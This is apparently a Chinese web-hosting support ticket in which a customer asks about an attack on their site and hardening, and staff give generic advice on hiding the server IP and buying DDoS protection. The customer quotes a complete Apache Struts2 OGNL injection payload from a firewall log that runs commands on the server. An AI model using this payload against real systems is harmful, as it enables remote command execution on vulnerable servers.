问:网站被攻击,排查下漏洞,和加固,网站被攻击,排查下漏洞,和加固
问:www.exuemei.com 这个网站
答:您好,
查询域名www.exuemei.com是解析到服务器127.0.0.1的,目前本地测试访问该站点没有明显异常,模拟百度蜘蛛访问也是正常的,请您说明下具体有问题的地方,并提供下相关截图以便我司核实;非常感谢您长期对我司的支持!
问:
问:这种文件夹是生成出来的
问:能电话的话 可以电话沟通一下
问:服务器上装有安全狗,安全狗给的防护日志中
(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows 2017'}:{'/bin/bash','-c','echo linux 2017'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
利用了这种把服务器的ip给暴露出来了,请问该如何防范呢?
答:您好,
安装安全狗后,若有异常请求会自动拦截,外部还可以开启百度云加速,将域名解析到别名地址,隐藏真实IP
,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
问:
我想问的是 这种是否暴露返回服务器的真实IP
答:您好,
日志提示访问直接访问服务器IP,从记录看此服务器多次受攻击,而且有超大攻击的情况,核实服务器内具体应用,若应用本身风险很高,建议您购买高级ddos防护,非常感谢您长期对我司的支持!
